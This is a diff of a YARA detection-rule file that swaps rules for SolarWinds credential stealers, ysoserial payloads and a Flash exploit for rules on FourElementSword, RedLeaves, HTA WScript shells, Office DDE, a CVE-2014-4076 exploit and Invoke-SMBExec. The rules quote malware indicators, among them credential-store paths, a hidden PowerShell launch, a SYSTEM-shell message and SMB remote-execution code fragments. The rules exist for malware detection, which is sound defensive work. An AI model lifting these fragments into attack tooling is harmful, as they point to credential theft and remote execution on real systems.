-		description = "Detects solarwinds credential stealers like e.g. solarflare via the touched certificate, files and database columns"
-		author = "Arnim Rupp"
-		id = "87dba889-367a-5fc3-b5e0-eb8e3c36a5e9"
-		date = "2021-01-20"
+		description = "Detects FourElementSword Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "62affc03-a408-5d8f-99da-58dead8646c5"
+		date = "2016-04-18"
 		modified = "2023-12-05"
-		reference = "https://github.com/mubix/solarflare"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_solarwinds_credential_stealer.yar#L2-L27"
+		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_four_element_sword.yar#L123-L137"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1b2e5186464ed0bdd38fcd9f4ab294a7ba28bd829bf296584cbc32e2889037e4"
-		hash = "4adb69d4222c80d97f8d64e4d48b574908a518f8d504f24ce93a18b90bd506dc"
-		logic_hash = "ccf55ba7b66ff8d0f926999f3d68dc3b2fdc1c9ce15e1f08b75d003c62393312"
+		hash = "9b6053e784c5762fdb9931f9064ba6e52c26c2d4b09efd6ff13ca87bbb33c692"
+		logic_hash = "7b1986845d97dcd11c8baddb0b49350ad30c6fff98840275befef4ad0b906b54"
 		score = 75
-		quality = 51
-		tags = "FILE"
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$certificate = "CN=SolarWinds-Orion" ascii nocase wide
-		$credfile1 = "\\CredentialStorage\\SolarWindsDatabaseAccessCredential" ascii nocase wide
-		$credfile2 = "\\KeyStorage\\CryptoHelper\\default.dat" ascii nocase wide
-		$credfile3 = "\\Orion\\SWNetPerfMon.DB" ascii nocase wide
-		$credfile4 = "\\Orion\\RabbitMQ\\.erlang.cookie" ascii nocase wide
-		$sql1 = "encryptedkey" ascii nocase wide fullword
-		$sql2 = "protectiontype" ascii nocase wide fullword
-		$sql3 = "CredentialProperty" ascii nocase wide fullword
-		$sql4 = "passwordhash" ascii nocase wide fullword
-		$sql5 = "credentialtype" ascii nocase wide fullword
-		$sql6 = "passwordsalt" ascii nocase wide fullword
+		$s0 = "start /min powershell C:\\\\ProgramData\\\\wget.exe" ascii
+		$s1 = "start /min powershell C:\\\\ProgramData\\\\iuso.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $certificate and ( 2 of ( $credfile* ) or 5 of ( $sql* ) )
+		1 of them
 }
-rule SIGNATURE_BASE_Flash_CVE_2015_5119_APT3_Leg : CVE_2015_5119 FILE
+rule SIGNATURE_BASE_Fourelementsword_Resn32Dll
 {
 	meta:
-		description = "Exploit Sample CVE-2015-5119"
+		description = "Detects FourElementSword Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d9efaea3-0644-501a-990b-665e257beb86"
-		date = "2015-08-01"
+		id = "3e1f6d8d-53ea-542f-ba49-39b4c86f3124"
+		date = "2016-04-18"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2015_5119.yar#L2-L21"
+		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_four_element_sword.yar#L139-L154"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "99af6b9ecc18b87b14968eb8fffefac7be10dd727d8af2d0488fae4a96196e85"
-		score = 70
+		hash = "bf1b00b7430899d33795ef3405142e880ef8dcbda8aab0b19d80875a14ed852f"
+		logic_hash = "9658ae3d1267993551cfb939f75f3d78de18cbeb2f524c2576b849103f3cacdc"
+		score = 75
 		quality = 85
-		tags = "CVE-2015-5119, FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		yaraexchange = "No distribution without author's consent"
 
 	strings:
-		$s0 = "HT_exploit" fullword ascii
-		$s1 = "HT_Exploit" fullword ascii
-		$s2 = "flash_exploit_" ascii
-		$s3 = "exp1_fla/MainTimeline" ascii fullword
-		$s4 = "exp2_fla/MainTimeline" ascii fullword
-		$s5 = "_shellcode_32" ascii
-		$s6 = "todo: unknown 32-bit target" fullword ascii
+		$s1 = "\\Release\\BypassUAC.pdb" ascii
+		$s2 = "\\ResN32.dll" wide
+		$s3 = "Eupdate" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5746 and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Mal_Babbleloader_Win_Jan24 : FILE
+rule SIGNATURE_BASE_Fourelementsword_Elevatedll : FILE
 {
 	meta:
-		description = "This rule detects intrinsic patterns of BabbleLoader."
-		author = "0x0d4y"
-		id = "b2f18ab3-b4df-4e2f-aa23-de8694beb221"
-		date = "2025-01-27"
-		modified = "2025-03-20"
-		reference = "https://0x0d4y.blog/babbleloader-technical-malware-analysis/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_babbleloader_win_jan24.yar#L1-L24"
+		description = "Detects FourElementSword Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "06879d75-18a3-5d49-a963-fa4bee379387"
+		date = "2016-04-18"
+		modified = "2023-12-05"
+		reference = "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_four_element_sword.yar#L158-L179"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fa3d03c319a7597712eeff1338dabf92"
-		logic_hash = "d4f7915146b1f3fe50febc231247e14323e9d68a94b2b9c8149a5727c06162ca"
-		score = 100
+		logic_hash = "d110bae02f00d14c5a71ecf5991e9fc38b29d8056d1e551dc36376875d2e1333"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "CC BY 4.0"
-		rule_matching_tlp = "TLP:WHITE"
-		rule_sharing_tlp = "TLP:WHITE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "3dfc94605daf51ebd7bbccbb3a9049999f8d555db0999a6a7e6265a7e458cab9"
+		hash2 = "5f3d0a319ecc875cc64a40a34d2283cb329abcf79ad02f487fbfd6bef153943c"
 
 	strings:
-		$str_decryption_algorithm = { 48 63 44 24 ?? 48 8b 4c 24 ?? 0f b6 04 ?? 33 44 ?? ?? 0f b6 4c ?? ?? d2 c8 48 63 4c ?? ?? 48 8b 54 ?? ?? 88 04 0a 6b 44 24 ?? ?? 89 44 ?? ?? 8b 44 24 ?? ff c0 89 44 24 }
-		$hashing_algorithm = { 48 8b 44 24 ?? 0f be ?? 89 44 24 ?? 8b 44 24 ?? 89 44 24 ?? 48 8b 44 24 ?? 48 ff c0 48 89 44 24 ?? 83 7c 24 08 ?? ?? ?? 8b 44 24 ?? 8b 0c ?? 03 c8 8b c1 89 04 24 8b 44 24 ?? 05 ?? ?? ?? ?? 8b 0c 24 0f af c8 8b c1 89 04 }
-		$halos_gate = { 48 8b 44 24 ?? 0f b6 ?? 83 f8 4c 0f ?? ?? ?? ?? ?? 48 8b 44 ?? ?? 0f b6 ?? ?? 3d 8b ?? ?? ?? 75 ?? 48 8b 44 ?? ?? 0f b6 40 ?? 3d d1 ?? ?? ?? 75 ?? 48 8b 44 ?? ?? 0f b6 40 ?? 3d b8 ?? ?? ?? 75 ?? 48 8b 44 ?? ?? 0f b6 40 ?? 85 c0 75 ?? 48 8b 44 ?? ?? 0f b6 40 ?? 85c0 75 ?? 48 8b 44 ?? ?? 0f b6 40 ?? 88 44 ?? ?? 48 8b 44 24 ?? 0f b6 40 ?? 88 44 ?? ?? 0f b6 44 ?? ?? c1 e0 08 0f b6 4c ?? ?? 0b c1 48 8b 8c ?? ?? ?? ?? ?? 89 01 ?? ?? ?? ?? ?? 48 8b 44 ?? ?? 0f b6 00 3d e9 }
-		$get_syscall_offset = { 4d 33 db 4c 8b d9 c3 }
-		$jump_syscall_offset = { 4c 8b d1 41 8b 03 41 ff 63 ?? }
+		$x1 = "Elevate.dll" fullword wide
+		$x2 = "ResN32.dll" fullword wide
+		$s1 = "Kingsoft\\Antivirus" fullword wide
+		$s2 = "KasperskyLab\\protected" fullword wide
+		$s3 = "Sophos" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $str_decryption_algorithm and $hashing_algorithm and ( 1 of ( $halos_gate , $get_syscall_offset , $jump_syscall_offset ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of ( $x* ) and all of ( $s* ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Ysoserial_Payload_Mozillarhino1 : FILE
+rule SIGNATURE_BASE_SUSP_Nullsoftinst_Combo_Oct20_1 : FILE
 {
 	meta:
-		description = "Ysoserial Payloads - file MozillaRhino1.bin"
+		description = "Detects suspicious NullSoft Installer combination with common Copyright strings"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c269e032-b6ce-5faa-b3ce-a5304f3e9dab"
-		date = "2017-02-04"
+		id = "380f30a6-df6b-50c6-bb2d-b8785564bbac"
+		date = "2020-10-06"
 		modified = "2023-12-05"
-		reference = "https://github.com/frohoff/ysoserial"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_ysoserial_payloads.yar#L10-L23"
+		reference = "https://twitter.com/malwrhunterteam/status/1313023627177193472"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_anomalies_keyword_combos.yar#L2-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ca8cdd2781812ed373ca558b3a5a2fac5d236e16e6dbb8d66caa45081aef968b"
-		score = 75
+		logic_hash = "8aef24295281da5ffa1c6f865eaa6cc8d60ea1df670058220bdb97651b6114cd"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0143fee12fea5118be6dcbb862d8ba639790b7505eac00a9f1028481f874baa8"
+		hash1 = "686b5240e5e503528cc5ac8d764883413a260716dd290f114a60af873ee6a65f"
+		hash2 = "93951379e57e4f159bb62fd7dd563d1ac2f3f23c80ba89f2da2e395b8a647dcf"
+		hash3 = "a9ca1d6a981ccc8d8b144f337c259891a67eb6b85ee41b03699baacf4aae9a78"
 
 	strings:
-		$s3 = "ysoserial.payloads" fullword ascii
+		$a1 = "NullsoftInst" ascii
+		$b1 = "Microsoft Corporation" wide fullword
+		$b2 = "Apache Software Foundation" ascii wide fullword
+		$b3 = "Simon Tatham" wide fullword
+		$fp1 = "nsisinstall" fullword ascii
+		$fp2 = "\\REGISTRY\\MACHINE\\Software\\" wide
+		$fp3 = "Apache Tomcat" wide fullword
+		$fp4 = "Bot Framework Emulator" wide fullword
+		$fp5 = "Firefox Helper" wide fullword
+		$fp6 = "Paint.NET Setup" wide fullword
+		$fp7 = "Microsoft .NET Services Installation Utility" wide fullword
+		$fp8 = "License: MPL 2" wide
 
 	condition:
-		( uint16( 0 ) == 0xedac and filesize < 40KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and $a1 and 1 of ( $b* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Ysoserial_Payload_C3P0 : FILE
+
+rule SIGNATURE_BASE_MAL_Hogfish_Report_Related_Sample : FILE
 {
 	meta:
-		description = "Ysoserial Payloads - file C3P0.bin"
+		description = "Detects APT10 / Hogfish related samples"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c269e032-b6ce-5faa-b3ce-a5304f3e9dab"
-		date = "2017-02-04"
+		id = "7fc4fdda-b71f-5c9c-87a4-5d8290b99348"
+		date = "2018-05-01"
 		modified = "2023-12-05"
-		reference = "https://github.com/frohoff/ysoserial"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_ysoserial_payloads.yar#L25-L38"
+		reference = "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt10_redleaves.yar#L13-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "53188caff69e1dbf655f4df7cda1406dd357af14a92ca4e686f514299b0adafc"
+		logic_hash = "bff74f7a72a3e40e828284ed37b2f7ea64d8df52e946372d38e379d9b7b7a445"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9932108d65e26d309bf7d97d389bc683e52e91eb68d0b1c8adfe318a4ec6e58b"
+		hash1 = "f9acc706d7bec10f88f9cfbbdf80df0d85331bd4c3c0188e4d002d6929fe4eac"
+		hash2 = "7188f76ca5fbc6e57d23ba97655b293d5356933e2ab5261e423b3f205fe305ee"
+		hash3 = "4de5a22cd798950a69318fdcc1ec59e9a456b4e572c2d3ac4788ee96a4070262"
 
 	strings:
-		$x1 = "exploitppppw" fullword ascii
+		$s1 = "R=user32.dll" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0xedac and filesize < 3KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.imphash ( ) == "efad9ff8c0d2a6419bf1dd970bcd806d" or 1 of them )
 }
-rule SIGNATURE_BASE_Ysoserial_Payload_Spring1
+
+rule SIGNATURE_BASE_MAL_Redleaves_Apr18_1 : FILE
 {
 	meta:
-		description = "Ysoserial Payloads - file Spring1.bin"
+		description = "Detects RedLeaves malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c269e032-b6ce-5faa-b3ce-a5304f3e9dab"
-		date = "2017-02-04"
+		id = "578b40d7-6818-56d5-92ce-535141c0aa8e"
+		date = "2018-05-01"
 		modified = "2023-12-05"
-		reference = "https://github.com/frohoff/ysoserial"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_ysoserial_payloads.yar#L40-L59"
+		reference = "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt10_redleaves.yar#L33-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "852390d242c5cac243b54c31234c0ef3e25cede376eea23c73f03d79c548be8a"
+		logic_hash = "e34b95e96de88aef20050b6b9580600365284117918c24f76c884b089fa20623"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "bf9b5f35bc1556d277853b71da24faf23cf9964d77245018a0fdf3359f3b1703"
-		hash2 = "9c0be107d93096066e82a5404eb6829b1daa6aaa1a7b43bcda3ddac567ce715a"
-		hash3 = "8cfa85c16d37fb2c38f277f39cafb6f0c0bd7ee62b14d53ad1dd9cb3f4b25dd8"
-		hash4 = "5c44482350f1c6d68749c8dec167660ca6427999c37bfebaa54f677345cdf63c"
-		hash5 = "95f966f2e8c5d0bcdfb34e603e3c0b911fa31fc960308e41fcd4459e4e07b4d1"
-		hash6 = "1da04d838141c64711d87695a4cdb4eedfd4a206cc80922a41cfc82df8e24187"
-		hash7 = "adf895fa95526c9ce48ec33297156dd69c3dbcdd2432000e61b2dd34ffc167c7"
-
-	strings:
-		$x1 = "ysoserial/Pwner" ascii
+		tags = "FILE"
+		hash1 = "f6449e255bc1a9d4a02391be35d0dd37def19b7e20cfcc274427a0b39cb21b7b"
+		hash2 = "db7c1534dede15be08e651784d3a5d2ae41963d192b0f8776701b4b72240c38d"
+		hash3 = "d956e2ff1b22ccee2c5d9819128103d4c31ecefde3ce463a6dea19ecaaf418a1"
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.imphash ( ) == "7a861cd9c495e1d950a43cb708a22985" or pe.imphash ( ) == "566a7a4ef613a797389b570f8b4f79df" )
 }
-rule SIGNATURE_BASE_Ysoserial_Payload : FILE
+rule SIGNATURE_BASE_HTA_With_Wscript_Shell
 {
 	meta:
-		description = "Ysoserial Payloads"
+		description = "Detects WScript Shell in HTA"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c269e032-b6ce-5faa-b3ce-a5304f3e9dab"
-		date = "2017-02-04"
+		id = "2faf74b1-c19c-53f0-ad08-be9caf5640bc"
+		date = "2017-06-21"
 		modified = "2023-12-05"
-		reference = "https://github.com/frohoff/ysoserial"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_ysoserial_payloads.yar#L61-L90"
+		reference = "https://twitter.com/msftmmpc/status/877396932758560768"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_hta_anomalies.yar#L11-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "eec48af8bd3b377c8dd5af71027f67b36e1bd4d4ccfbd8134a26783517b5585a"
-		score = 75
+		logic_hash = "7ce2728fbd3023a6b96291cdb63f30dc9b71e5fc506f8b00ad97e3062b103478"
+		score = 80
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "9c0be107d93096066e82a5404eb6829b1daa6aaa1a7b43bcda3ddac567ce715a"
-		hash2 = "adf895fa95526c9ce48ec33297156dd69c3dbcdd2432000e61b2dd34ffc167c7"
-		hash3 = "1da04d838141c64711d87695a4cdb4eedfd4a206cc80922a41cfc82df8e24187"
-		hash4 = "5c44482350f1c6d68749c8dec167660ca6427999c37bfebaa54f677345cdf63c"
-		hash5 = "747ba6c6d88470e4d7c36107dfdff235f0ed492046c7ec8a8720d169f6d271f4"
-		hash6 = "f0d2f1095da0164c03a0e801bd50f2f06793fb77938e53b14b57fd690d036929"
-		hash7 = "5466d47363e11cd1852807b57d26a828728b9d5a0389214181b966bd0d8d7e56"
-		hash8 = "95f966f2e8c5d0bcdfb34e603e3c0b911fa31fc960308e41fcd4459e4e07b4d1"
-		hash9 = "1fea8b54bb92249203d68d5564a01599b42b46fc3a828fe0423616ee2a2f2d99"
-		hash10 = "0143fee12fea5118be6dcbb862d8ba639790b7505eac00a9f1028481f874baa8"
-		hash11 = "8cfa85c16d37fb2c38f277f39cafb6f0c0bd7ee62b14d53ad1dd9cb3f4b25dd8"
-		hash12 = "bf9b5f35bc1556d277853b71da24faf23cf9964d77245018a0fdf3359f3b1703"
-		hash13 = "f756c88763d48cb8d99e26b4773eb03814d0bd9bd467cc743ebb1479b2c4073e"
+		hash1 = "ca7b653cf41e980c44311b2cd701ed666f8c1dbc"
 
 	strings:
-		$x1 = "ysoserial/payloads/" ascii
-		$s1 = "StubTransletPayload" fullword ascii
-		$s2 = "Pwnrpw" fullword ascii
+		$s1 = "<hta:application windowstate=\"minimize\"/>"
+		$s2 = "<script>var b=new ActiveXObject(\"WScript.Shell\");" ascii
 
 	condition:
-		( uint16( 0 ) == 0xedac and filesize < 40KB and $x1 ) or ( all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Ysoserial_Payload_3 : FILE
+rule SIGNATURE_BASE_HTA_Embedded
 {
 	meta:
-		description = "Ysoserial Payloads - from files JavassistWeld1.bin, JBossInterceptors.bin"
+		description = "Detects an embedded HTA file"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7fb67f48-66dc-57a4-9075-49b2277fa186"
-		date = "2017-02-04"
+		id = "04d4c718-9dd6-5528-8712-61c9f2a16139"
+		date = "2017-06-21"
 		modified = "2023-12-05"
-		reference = "https://github.com/frohoff/ysoserial"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_ysoserial_payloads.yar#L92-L113"
+		reference = "https://twitter.com/msftmmpc/status/877396932758560768"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_hta_anomalies.yar#L28-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "49491d1c15af8c271fbbb7dedc678a91df74dcb093abe3f056b1ffc2fced99fe"
-		score = 75
+		logic_hash = "843f0ad5e39e5492db8ff7372f6d2038e7dbb7823ec9b33f863ab891a108b1ec"
+		score = 50
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "f0d2f1095da0164c03a0e801bd50f2f06793fb77938e53b14b57fd690d036929"
-		hash2 = "5466d47363e11cd1852807b57d26a828728b9d5a0389214181b966bd0d8d7e56"
+		hash1 = "ca7b653cf41e980c44311b2cd701ed666f8c1dbc"
 
 	strings:
-		$x1 = "ysoserialq" fullword ascii
-		$s1 = "targetClassInterceptorMetadatat" fullword ascii
-		$s2 = "targetInstancet" fullword ascii
-		$s3 = "targetClassL" fullword ascii
-		$s4 = "POST_ACTIVATEsr" fullword ascii
-		$s5 = "PRE_DESTROYsq" fullword ascii
+		$s1 = "<hta:application windowstate=\"minimize\"/>"
 
 	condition:
-		( uint16( 0 ) == 0xedac and filesize < 10KB and $x1 ) or ( all of them )
+		$s1 and not $s1 in ( 0 .. 50000 )
 }
-rule SIGNATURE_BASE_Fidelis_Advisory_Purchase_Order_Pps
+rule SIGNATURE_BASE_Office_OLE_DDE : FILE
 {
 	meta:
-		description = "Detects a string found in a malicious document named Purchase_Order.pps"
-		author = "Florian Roth (Nextron Systems)"
-		id = "205c4cda-6874-5455-8eb9-b63fb09b13fd"
-		date = "2015-06-09"
+		description = "Detects DDE in MS Office documents"
+		author = "NVISO Labs"
+		id = "2ead3cc9-f517-5916-93c9-1393362aa45d"
+		date = "2017-10-12"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/ZjJyti"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fidelis_phishing_plain_sight.yar#L2-L14"
+		reference = "https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_dde_in_office_docs.yar#L48-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "45cfee6413accff36a39ced861a29c611d6efe24e1ca87f17467106f8565642b"
-		score = 75
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "2d2f7dce166dc8ef8aba7e8eaafaf4d1bb34cdc1ce97d34125a65147cf5e08ac"
+		score = 50
+		quality = 35
+		tags = "FILE"
 
 	strings:
-		$s0 = "Users\\Gozie\\Desktop\\Purchase-Order.gif" ascii
+		$a = /\x13\s*DDE\b[^\x14]+/ nocase
+		$r1 = { 52 00 6F 00 6F 00 74 00 20 00 45 00 6E 00 74 00 72 00 79 }
+		$r2 = "Adobe ARM Installer"
 
 	condition:
-		all of them
+		uint32be( 0 ) == 0xD0CF11E0 and $a and not 1 of ( $r* )
 }
-rule SIGNATURE_BASE_Fidelis_Advisory_Cedt370
+rule SIGNATURE_BASE_CVE_2014_4076_Exploitcode : CVE_2014_4076 FILE
 {
 	meta:
-		description = "Detects a string found in memory of malware cedt370r(3).exe"
+		description = "Detects an exploit code for CVE-2014-4076"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b5ebf2d7-e3e4-5b3b-a082-417da9c7fda6"
-		date = "2015-06-09"
+		id = "83563dea-63d9-58a9-82ed-275455122571"
+		date = "2018-04-04"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/ZjJyti"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fidelis_phishing_plain_sight.yar#L16-L30"
+		reference = "https://github.com/Neo23x0/yarGen"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2014_4076.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1070d3c63a7091c0982e67134f9dc3cd790bb0b5c2ac08f3a00e3b97ef53d64b"
+		logic_hash = "96b8743de8b3968d64b74af93f5e61574a3b31d33df6d51e944b4f02c7b9723e"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "CVE-2014-4076, FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "44690af85efef2db04c7e8cba7ca0d0e53be1a1432a339570a7d26eec860b8ee"
 
 	strings:
-		$s0 = "PO.exe" ascii fullword
-		$s1 = "Important.exe" ascii fullword
-		$s2 = "&username=" ascii fullword
-		$s3 = "Browsers.txt" ascii fullword
+		$x1 = "[+] Created a new cmd.exe process" fullword ascii
+		$x2 = "[+] Modified shellcode" fullword ascii
+		$x3 = "[*] Spawning SYSTEM shell..." fullword ascii
+		$x4 = "[*] MS14-070 (CVE-2014-4076) x86" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
 }
-rule SIGNATURE_BASE_SUSP_ZIP_LNK_Phishattachment_Pattern_Jun22_1 : FILE
+rule SIGNATURE_BASE_Invoke_Smbexec : FILE
 {
 	meta:
-		description = "Detects suspicious tiny ZIP files with phishing attachment characteristics"
+		description = "Detects Invoke-WmiExec or Invoke-SmbExec"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3537c4ea-a51d-5100-97d7-71a24da5ff43"
-		date = "2022-06-23"
+		id = "07c742f4-3039-5c84-81d4-73ad25b98681"
+		date = "2017-06-14"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_phish_attachments.yar#L2-L21"
+		reference = "https://github.com/Kevin-Robertson/Invoke-TheHash"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_invoke_thehash.yar#L12-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2ff398379e3d8112991eeacd99bf9d3bafbf3e9266f012d2539d6b2661d5969e"
-		score = 65
+		logic_hash = "cc9feb7d4eadfc470aabf18d82c884f454ebcdd37f3ca6b0ee4b3634cd9e33ae"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "4edb41f4645924d8a73e7ac3e3f39f4db73e38f356bc994ad7d03728cd799a48"
-		hash2 = "c4fec375b44efad2d45c49f30133efbf6921ce82dbb2d1a980f69ea6383b0ab4"
-		hash3 = "9c70eeac97374213355ea8fa019a0e99e0e57c8efc43daa3509f9f98fa71c8e4"
-		hash4 = "ddc20266e38a974a28af321ab82eedaaf51168fbcc63ac77883d8be5200dcaf9"
-		hash5 = "b59788ae984d9e70b4f7f5a035b10e6537063f15a010652edd170fc6a7e1ea2f"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "674fc045dc198874f323ebdfb9e9ff2f591076fa6fac8d1048b5b8d9527c64cd"
 
 	strings:
-		$sl1 = ".lnk"
+		$x1 = "Invoke-SMBExec -Target" fullword ascii
+		$x2 = "$packet_SMB_header = Get-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $process_ID_bytes $SMB_user_ID" fullword ascii
+		$s1 = "Write-Output \"Command executed with service $SMB_service on $Target\"" fullword ascii
+		$s2 = "$packet_RPC_data = Get-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00" fullword ascii
+		$s3 = "$SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \\svcctl" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 2KB and $sl1 in ( filesize -256 .. filesize )
+		( filesize < 400KB and 1 of them )
 }
-rule SIGNATURE_BASE_SUSP_ZIP_ISO_Phishattachment_Pattern_Jun22_1 : FILE
+rule SIGNATURE_BASE_Invoke_Wmiexec_Gen_1
 {
 	meta:
-		description = "Detects suspicious small base64 encoded ZIP files (MIME email attachments) with .iso files as content as often used in phishing attacks"
+		description = "Detects Invoke-WmiExec or Invoke-SmbExec"
 		author = "Florian Roth (Nextron Systems)"
-		id = "638541a6-d2d4-513e-978c-9d1b9f5e3b71"
